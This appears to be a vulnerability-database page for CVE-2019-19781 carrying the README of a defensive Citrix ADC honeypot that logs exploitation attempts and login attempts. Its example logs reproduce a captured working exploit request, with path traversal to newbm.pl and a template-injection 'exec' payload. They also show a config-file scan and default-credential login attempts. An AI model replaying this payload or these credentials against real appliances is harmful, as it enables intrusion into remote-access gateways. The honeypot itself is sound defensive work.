
CVE-2019-19781 PoC — Citrix Application Delivery Controller and Citrix Systems Gateway Path Traversal Vulnerability

Associated Vulnerability
Title: Citrix Application Delivery Controller and Citrix Systems Gateway Path Traversal Vulnerability (CVE-2019-19781)
Description: Citrix Systems NetScaler Gateway (Citrix Systems Gateway) and Citrix Application Delivery Controller (ADC) are both products of the US company Citrix Systems. Citrix Systems NetScaler Gateway is a secure remote-access solution. It gives administrators application-level and data-level controls so that users can remotely access applications and data from any location. Citrix Application Delivery Controll
Description
Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts
Readme
# Citrix ADC (NetScaler) Honeypot
- Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
- Logs failed login attempts
- Serves content and headers taken from a real appliance in order to increase the chance of being indexed by search engines (e.g. Google, Shodan, etc.)

![screenshot](https://github.com/x1sec/citrix-honeypot/blob/master/img/screenshot.png)

## Installation

### Precompiled
Precompiled Linux (x64) package available [here](https://github.com/x1sec/citrix-honeypot/releases)

```bash
mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz
```

### go get
If you have a [Go](https://golang.org/) environment ready to go:

```bash
go get github.com/x1sec/citrix-honeypot
```

### Running
Generate self signed certificate:
```bash
# Generate one private key for the listener: either RSA ...
openssl genrsa -out server.key 2048
# ... or EC. This overwrites the server.key written above, so run only one of the two.
openssl ecparam -genkey -name secp384r1 -out server.key
# Issue a self-signed certificate for that key, valid for 10 years
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650
```

Running it is as easy as:
```bash
./citrix-honeypot
```

The honeypot will listen on both port `80` and `443` (so it must be run as the `root` user).

Or to detach and run as a background process:
```bash
nohup ./citrix-honeypot &
```

## Logs
Results and data are written to the `./log` directory. The files are:

`hits.log` - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

`all.log` - All HTTP requests that are observed hitting the server

`logins.log` - Attempted logins to the web interface

`tlsErrors.log` - Often internet scanners will send invalid data to port `443`. HTTPS errors are logged here.

### Examples

Running [the first publicly released exploit](https://github.com/projectzeroindia/CVE-2019-19781):
```
$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb
```

Scanning attempt:
```
$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0
```

Login attempts:
```
$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
```
File Snapshot

```
[4.0K] /data/pocs/fc3fd65ed354149f9ab4405449d79049b773d544
├── [4.0K] img
│   └── [124K] screenshot.png
├── [1.0K] LICENSE
├── [6.5K] main.go
├── [2.7K] README.md
└── [4.0K] static
    ├── [4.0K] admin_ui
    │   ├── [4.0K] common
    │   │   ├── [4.0K] css
    │   │   │   └── [4.0K] ns
    │   │   │       ├── [3.5K] button-sprite.png
    │   │   │       ├── [2.7K] bytemobile_logo_header.png
    │   │   │       ├── [3.1K] citrix_login_page_logo.png
    │   │   │       ├── [ 765] company_logo.png
    │   │   │       ├── [ 978] down_arrow_top.png
    │   │   │       ├── [1.1K] footer_sprite.png
    │   │   │       ├── [ 14K] login_footer_background.png
    │   │   │       ├── [1.1K] pipe.png
    │   │   │       ├── [ 240] selected_tab_left.gif
    │   │   │       ├── [1.3K] selected_tab_right.gif
    │   │   │       ├── [ 39K] ui.css
    │   │   │       ├── [1.4K] unselected_tab_left.gif
    │   │   │       └── [4.2K] unselected_tab_right.gif
    │   │   ├── [4.0K] images
    │   │   │   ├── [ 11K] dashboard_reporting_sprite_images.png
    │   │   │   └── [2.1K] dwnloads_docs_sprite_images.png
    │   │   └── [4.0K] js
    │   │       └── [4.0K] jquery
    │   │           ├── [1.4K] jquery.keyfilter.min.js
    │   │           ├── [8.8K] jquery-migrate.js
    │   │           └── [ 86K] jquery.min.js
    │   ├── [4.0K] neo
    │   │   └── [4.0K] images
    │   │       ├── [1.3K] nav_down_red.png
    │   │       ├── [1.4K] nav_down_yellow.png
    │   │       ├── [ 664] nav_plain_gray.png
    │   │       └── [1.4K] nav_up_green.png
    │   └── [4.0K] rdx
    │       └── [4.0K] core
    │           └── [4.0K] css
    │               ├── [4.7K] chrome.png
    │               ├── [826K] citrix_white_bg.png
    │               ├── [6.6K] firefox.png
    │               ├── [4.0K] fonts
    │               │   └── [4.0K] citrix_sans
    │               │       ├── [ 21K] citrixsans_bold.eot
    │               │       ├── [ 21K] citrixsans_bold.eot?
    │               │       ├── [ 72K] citrixsans_bold.svg
    │               │       ├── [ 43K] citrixsans_bold.ttf
    │               │       ├── [ 25K] citrixsans_bold.woff
    │               │       ├── [ 22K] citrixsans_regular.eot
    │               │       ├── [ 22K] citrixsans_regular.eot?
    │               │       ├── [ 72K] citrixsans_regular.svg
    │               │       ├── [ 43K] citrixsans_regular.ttf
    │               │       └── [ 26K] citrixsans_regular.woff
    │               ├── [5.7K] internet-explorer.png
    │               └── [7.7K] safari.png
    ├── [ 19K] do_login.html
    └── [ 19K] index.html

16 directories, 43 files
```